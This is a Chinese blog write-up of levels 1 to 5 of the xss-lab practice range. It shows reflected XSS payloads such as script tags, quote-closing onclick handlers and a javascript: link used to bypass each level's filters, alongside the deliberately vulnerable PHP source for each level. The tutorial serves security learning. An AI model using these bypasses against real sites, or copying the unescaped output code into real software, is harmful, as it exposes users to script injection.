xss-lab(1-5)关卡笔记

最新推荐文章于 2024-04-20 18:01:32 发布
最新推荐文章于 2024-04-20 18:01:32 发布
阅读量436 收藏
点赞数 4
分类专栏: Web安全 靶场笔记 文章标签: web安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yoo_666/article/details/107300198
版权

文章目录

(一)XSS

XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,xss漏洞大多数是寻找参数未过滤的输出函数。

(二)xss-lab

xss-lab下载链接

在这里插入图片描述

(三)关卡笔记

第一关

首先通过测试,name赋予不同的值,在界面中将会回显对应的“欢迎用户某某某”
在这里插入图片描述
故尝试在标签处构造语句:

name=<script>alert(1)</script>

注入后,将会弹出消息框,提示成功信息
在这里插入图片描述
查看后台源码可知为GET型,只通过$_GET[“name”],获取name的值,并没有过滤直接echo输出

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

第二关

按照前一题的思路,在输入框中时输入不同的值,将会提示“没有找到和某某某相关的结果”,此时将第一关的构造语句直接输入并不能成功
在这里插入图片描述
猜测并尝试构造闭合

"><script>alert(1)</script>

注入后,弹出提示成功信息的消息框
在这里插入图片描述
查看后台源码

ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

可知在h2标签处.htmlspecialchars($str)进行了防御措施

<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>

注:htmlspecialchars()函数特殊字符转换为HTML实体,即:“ < ”,“ > ”,“ ” ”字符均会被过滤
但在input标签中,value未存在过滤措施,故可以利用此处进行测试

<input name=keyword  value="'.$str.'">

第三关

第三关与第二关看似相似,实则有挺大的不同,通过第二关的思路进行输入,将会发现“<”会被转换为html编码
在这里插入图片描述
尝试构造闭合标签的属性

' onclick='alert(1)

这个关卡和之后两三个关卡可能会出现注入成功,但没有回显,此时需要点击一下输入栏,若注入成功将会弹出回显弹窗
在这里插入图片描述
查看后台源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

可知h2标签和input标签都被使用htmlspecialchars()函数进行了过滤

<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>
<input name=keyword  value='".htmlspecialchars($str)."'>

但我们可以发现htmlspecialchars()函数并没有过滤单引号,故此处可以使用单引号闭合

第四关

这关与上一关(第三关)真正的类似了,可以尝试闭合标签的属性进行测试
在这里插入图片描述
构造语句

" onclick="alert(1)

在这里插入图片描述
查看后台源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

此处过滤了“<”,“>”,

$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);

但可以发现该关卡只对h2标签进行处理,input标签并未进行处理

第五关

尝试使用以下两种构造语句,script被替换成了scr_ipt,onerror被替换成o_nerror

“”><script>alert(1)</script>
"><img src=1 onerror=alert(1)

在这里插入图片描述
在这里插入图片描述
故猜测后台进行了关键字替换
采用其他标签构造语句

"><a href="javascript:alert(1)"

注:该构造语句好像也未能正常回显,需要点击输入框右侧的细小的下划线才能回显
在这里插入图片描述
查看后台源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

该关卡进行了大小写过滤和script、on关键字的过滤

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

第6-10关

xss-lab(6-10)关卡笔记

Yoo_666
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
Xss-labs(1)第一关到第十一关
m0_46412408的博客
09-25 710
Xss-labs靶场训练第一关:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二关,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一关是闭合绕过来到第三关,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
xss-labs通关攻略教程(level1~level 10)
最新发布
2401_84153270的博客
04-20 268
总结来说,面试成功=基础知识+项目经验+表达技巧+运气。我们无法控制运气,但是我们可以在别的地方花更多时间,每个环节都提前做好准备。面试一方面是为了找到工作,升职加薪,另一方面也是对于自我能力的考察。能够面试成功不仅仅是来自面试前的临时抱佛脚,更重要的是在平时学习和工作中不断积累和坚持,把每个知识点、每一次项目开发、每次遇到的难点知识,做好积累,实践和总结。点击这里领取Web前端开发经典面试题。
XSS-Lab 1-15
震山的博客
08-25 296
个人 XSS-Lab 通关记录
XSS-Lab 1-10
qq_51558360的博客
03-21 249
不使用过滤器 name=<script>alert(1)</script> 闭合标签 输入第一题的答案,没有成功,查看源码,发现: 我们输入的数据,是在表单中的value属性内 法一: 所以需要先闭合input标签,然后在注入代码,闭合标签: "><script>alert(1)</script> 法二: 是闭合value属性,然后在input标签内加入事件属性: " οnclick="alert(11) 单引号闭合并添加事件 输入测试:
xss-lab通关记录(一)
Boom!脑洞大爆炸的博客
03-01 1348
xss-lab打通关(1-5)
xss-lab全通关教程
05-07
xss-lab全通关教程,共有20个关,全部就压缩到文件里,另外购买还有可以私信博主,赠送xss环境
xss-lab靶场资源包
07-27
xss-lab靶场资源包
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
xss-lab 1-18
Jornici的博客
01-08 210
level1 http://192.168.1.5/xss-labs/level1.php?name=%3Cscript%3Ealert(/xss/)%3C/script%3E http://192.168.1.5/xss-labs/level1.php?name=<script>alert(/xss/)</script> level2 http://192.168.1.5/xss-labs/level2.php?keyword=1%22%3E%3Cscript%3Ealert(/
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9171
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
20210205pentestLab1靶场XSS
qq_45290991的博客
02-05 578
Pentester中的XSS详解 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_description" style="display: none"> <img src="...
XSS攻击-xss-lab(1-18)详细讲解
wrypot的博客
03-29 1396
发现单引号前面的内容被赋值给了value,也就是说单引号是value的闭合字符,构造语句开头一个单引号,后面加一个空格(input标签里面属性直接用空格隔开)所以我们接下来要做得事情是,首先&参数t_sort,然后用双引号闭合value值,接着将type类型从hidden隐藏改为text文本,再用onfocus事件触发js语句,最后别忘了,因为我们用双引号闭合了value,所以value本身有的一个双引号多出来了,我们在onfocus="javascript:alert(123)
XSS-labs
Mccc_li的博客
04-09 1067
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
XSS-labs 1-13关通关攻略
qq_57861415的博客
01-31 1384
xsslabs 1-13关攻略
xss-labs靶场1~7详解
金色%夕阳的博客
08-05 570
xss-labs靶场通关详解 level-1 分析 执行 level2 分析 执行 level3 分析 执行 level4 分析 执行 level5 分析 执行 level6 分析 执行 level7 分析 执行...
XSS-labs(1-10)闯关详解
m0_46467017的博客
07-25 2700
通过查看可以知道本关与上一关的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八关后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
XSS-Lab第十关
07-27
XSS-Lab的第十关是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一关都有不同的XSS注入漏洞。在第十关中,与上一关不同的是会加入地址的检查。具体来说,该关会检查输入的数据中是否...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值